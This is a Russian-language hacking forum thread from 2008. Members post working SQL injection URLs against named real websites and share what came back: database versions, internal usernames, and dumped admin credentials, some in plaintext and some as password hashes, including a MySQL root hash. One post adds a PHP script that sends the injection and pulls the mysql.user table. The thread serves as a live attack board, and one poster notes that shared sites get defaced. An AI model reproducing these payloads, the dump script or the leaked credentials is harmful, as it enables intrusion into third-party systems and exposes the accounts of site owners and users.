SQL Инъекции

Gorev · 16 May 2008

http://haberolay.net/detay.php?id=-6389+union+select+1,2,3,4,table_name,6, 7,8,9+from+information_schema.tables+limit+160,1/*

http://haberolay.net/detay.php?id=-6389+union+select+1,2,3,4,column_name,6, 7,8,9+from+information_schema.columns+where+table_name=0x62775f75736572/*

http://haberolay.net:2082/login/

version : 5.0.45-community
user : haberola_osman@localhost
database :haberola_osman

neon_fx · 16 May 2008

//*********************************

http://www.skyphoto.ru/forum/post.php?a=new_post&forum=-3+union+select+1,concat_ws(char(58),username,password,email),3,4+from+u9758.sp_users+limit+1/*
forum: admin:AV-natali

//************************************

http://tchirkounov.ru/forum/post.php?a=new_post&forum=-2+union+select+1,version(),3,4/*
4.0.24_Debian-10sarge3
chirnalog@localhost
dbchirnalog

//***************************************
http://www.is.ru-b.de/gboard/post.php?a=new_post&forum=-3+union+select+1,version(),3,4/*
4.0.27-standard-log
[email protected]
db18967113
//**************************************
http://wikipediawiki.org/post.php?a=new_post&forum=-1+union+select+1,version(),3,4
5.0.54
[email protected]
ulrik_db0

//***************************************
http://www.hurstwoodfarmpianos.co.uk/news.php?news_id=-16+union+select+1,2,concat_ws(char(58),username,password),4,5,6,7,8,9,10+from+user+limit+1+offset+0/*
marcus68:jerseybean
nawaraj:samsanjog
dain:cobnuts

pingpong@localhost
4.1.20
piano
Apache/2.0.52 (Red Hat)

//****************************
http://www.atur.com.ua/index.php?id=-903+union+select+1,2,3,4,5,6+from+users/*

atur@localhost
4.1.22
atur

Mr. P.S. · 17 May 2008

medinform.biz
Code:
http://www.medinform.biz/produser1.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13/*
4.1.22 : medinfo5main@localhost : medinfo5main

далее:
Code:
http://www.medinform.biz/produser1.php?id=-1+union+select+1,2,concat(name,0x3a,pas),4,5,6,7,8,9,10,11,12,13+from+users/*
Администратор : 123456789

=)

swt1 · 17 May 2008

http://board.barnaul-altai.ru/index.php?advert=1837+union+select+1,2,3,4,5,6,7,8,9/*

†c0(aIn?† · 18 May 2008

morozilnik.ru

Какой-то шоп бытовой техники с весьма экзотическим названием):
Code:
http://morozilnik.ru/eng/info/?code=1+union+select+1, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
5.0.32-Debian_7etch3-log
morozini@localhost
morozini

MaSter GeN · 18 May 2008

revolution.co.uk

Code:

http://www.revolution.co.uk/_forum.php?neuron=1&topic=4981&message=-58008 union select 1,2,3,aes_decrypt(aes_encrypt(version(),0x71), 0x71),5,6,7,8,9/*

"4.1.11-Debian_4sarge8-log"
"revuser@localhost"
"lucybase"

P.s из той же серии

Code:

http://www.720games.com/_forum.php?neuron=1&topic=2&message=12'
http://www.yorkshirekoi.co.uk/_forum.php?neuron=6&topic=20558&message=164530'

Snap · 19 May 2008

Продажа авто в спб!

http://www.autoway.spb.ru/show.php?id=-142+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(table_schema,0x3a,table_name,0x3a,column_name),17,18+from+information_schema.columns+limit+191,1/*

http://www.autoway.spb.ru/show.php?id=-142+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(table_schema,0x3a,table_name,0x3a,column_name),17,18+from+information_schema.columns+limit+192,1/*

http://www.autoway.spb.ru/show.php?id=-142+union+select+1,2,3,4,5,6,7,8,9,us_login,us_pass,12,13,14,15,16,17,18+from+x7_ows_user/*

http://www.autoway.spb.ru/admin/
Login: Admin
Pass: admin1

Gorev · 19 May 2008

http://www.trekstor.de/en/products/detail_hdd.php?pid=-15+union+select+1,us er(),3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6/*

version: 4.0.27-standard
user : dbo175992425@localhost
database :db175992425

зы спасибо всем тем кто оценивает мою работу плюсами.

Dr.Frank · 20 May 2008

Закладки:

Code:

http://www.social-bookmarks.ru/?item_id=99999999999999+union+select+1,convert(concat(database(),0x09,user(),0x09,version())+using+cp1251),3,4+limit+0,1--

Gorev · 20 May 2008

http://www.rededular.com.br/catalogo-sec.php?codcat=3&codsec=-60+uni on+select+1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1+from+infor mation_schema.tables+lim it+1,1/*

version:5.0.22
user:rededular@localhost
database : rededular

ну а дальше все зависит от вашей фантазии

Mr. P.S. · 20 May 2008

heavymetalsociety.org
Code:
http://www.heavymetalsociety.org/interview.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/*
4.1.22standard:heavymet@localhost:heavymet_hmssite
Code:
http://www.heavymetalsociety.org/interview.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6+from+users+limit+1,1/*
Первые 10 юзеров:
duncang:f02937159a1e31d72c7114bfe2d83015::renegades: - админ
Sanitarium:44a4dc99148a7577f78578177202dd7b:::
Colm C:eb95fc1ab8251cf1f8f870e7e4dae54d::megadeth:
The Noonster:f1a81d782dea6a19bdca383bffe68452::spider:
apoc:a25e01bddca85cdf4a4a3dafdd3aaa05::apoc:
Decrepit:2ccd23d1cd0f95dc6984215a1f1b31ca::sludge:
GravesOfYourMother:594bca3f02fc8fcfe8133ce01b4e3f43::graves:
Retorzio:fea1804c38c3e141e51894528967c4dc:::
Tsunekuni:597cee5b6e97930735991ad87fd423bc:::
Vagina Squasher:aa2d6e4f578eb0cfaba23beef76c2194::free:

Momiji · 20 May 2008

best49.eu
Code:
http://www.best49.eu/index.php?cat=-1+union+select+1,concat_ws(0x3,version(),user(),database()),3/*
4.1.22-standardbest49e_user1@localhostbest49e_best49
Code:
http://www.best49.eu/index.php?cat=-1+union+select+1,concat(username,0x3,passwd),3+from+users/*
webmastertest
b490ubgjhmix
b49101gtarqlud

Gorev · 21 May 2008

http://www.posugf.com.br/site_2008/curso.php?ID_Curso=-103+uni on+select+1,2,3,4,5--

version : 4.1.13-Debian_0.dotdeb.1-log
user : [email protected]
database: sistema_homologacao

Gorev · 21 May 2008

http://www.nelore.com/fazendas/luzz/novo/galeria_conteudo.php?areaid=-1+union+select+1,ta ble_name,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+information_schema.tables+limit+28,1/*

http://www.nelore.com/fazendas/luzz/novo/galeria_conteudo.php?areaid=-1+union+select+1,column_name,3,4 ,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+information_schema.columns+where+table_name=0x6162637a5f7573756172696f+limit+1,1/*

http://www.nelore.com/fazendas/luzz/novo/galeria_conteudo.php?areaid=-1+union+select+1,concat_ws(0x3a,no me,0x3a,email,0x3a,senha,0x3a,login),3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+abcz_usuario+limit+0,1/*

version :5.0.27-community-nt-log
user: nelore1@localhost
database: nelore1

ЗЫ Мне очень не нравится когда после того как я выложил на ачат скулю, какой нибудь киндер быстренько дефейснет сайт...выкладывать админку не буду.. уж извините.Всего доброго !

Momiji · 21 May 2008

falconleader.eu

Code:

http://www.falconleader.eu/index.php?cat=1&id=2&pid=-1+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/*

5.0.27[email protected]fiorano

Code:

http://www.falconleader.eu/index.php?cat=1&id=2&pid=-1+union+select+1,concat(name,0x3,passw),3,4,5,6,7,8,9,10,11,12+from+users/*

Sampsa346a55ca940cea871ae30d7c605c0b8a

КВР · 21 May 2008

openworld.gov
_http://www.openworld.gov/article/print.php?id=1 and 1=1
_http://www.openworld.gov/article/print.php?id=1 and 1=2

Ded MustD!e · 21 May 2008

http://www.fromthetop.org/

PR:6
Code:
http://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,0x3a,password),4,5,6,7+from+mysql.user/*
root:*CF57A666D82A1A6E307947399943403DD93CF490

КВР · 21 May 2008

Выводит всю базу .

PHP:

<? echo "<pre>\n"; @set_time_limit(0); @ini_set("display_errors","0"); $hostname = gethostbyname('fromthetop.org'); function from($from) { global $hostname; $responce = ""; $fsock = fsockopen($hostname,80,$errnum,$errstr,2); $headers = "GET hhttp://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,0x3a,password),4,5,6,7+from+$from/* HTTP/1.1\n"; $headers .= "Host: my-photo.ru\n"; $headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n"; $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; $headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n"; $headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n"; $headers .= "Keep-Alive: 500\n"; $headers .= "Connection: close\n"; $headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; fwrite ($fsock,$headers); while (!feof($fsock)) $responce .= fread($fsock,1024); fclose ($fsock); $patern = "#<[\s]*sqlinj[\s]*>([^<]*)<[\s]*/sqlinj[\s]*>#i"; if(preg_match($patern, $responce, $rez)) echo $rez[1]; else echo 'Something not right...'; //echo $responce; } from("mysql.user"); echo "</pre>"; ?>

Gorev · 21 May 2008

http://www.leuragardensfestival.com.au/page.php?id=-23+un ion+select+1,2, 3,4,5,6,7, 8,9,0/*

version :4.0.15-Max
user: leuragar@localhost
database : leuragar_db

Neoveneficus · 22 May 2008

http://www.poznay-mir.ru/tourist.php?uid=-1+union+select+1,2,3,4,version()/*

SQL Инъекции

Gorev Level 8

neon_fx Elder - Старейшина

Mr. P.S. Elder - Старейшина

swt1 Elder - Старейшина

†c0(aIn?† Member

MaSter GeN Elder - Старейшина

Snap Elder - Старейшина

Gorev Level 8

Dr.Frank Elder - Старейшина

Gorev Level 8

Mr. P.S. Elder - Старейшина

Momiji Elder - Старейшина

Gorev Level 8

Gorev Level 8

Momiji Elder - Старейшина

КВР Elder - Старейшина

Ded MustD!e Banned

КВР Elder - Старейшина

Gorev Level 8

Neoveneficus Elder - Старейшина

Useful Searches

SQL Инъекции

Gorev Level 8

neon_fx Elder - Старейшина

Mr. P.S. Elder - Старейшина

swt1 Elder - Старейшина

†c0(aIn?† Member

MaSter GeN Elder - Старейшина

Snap Elder - Старейшина

Gorev Level 8

Dr.Frank Elder - Старейшина

Gorev Level 8

Mr. P.S. Elder - Старейшина

Momiji Elder - Старейшина

Gorev Level 8

Gorev Level 8

Momiji Elder - Старейшина

КВР Elder - Старейшина

Ded MustD!e Banned

КВР Elder - Старейшина

Gorev Level 8

Neoveneficus Elder - Старейшина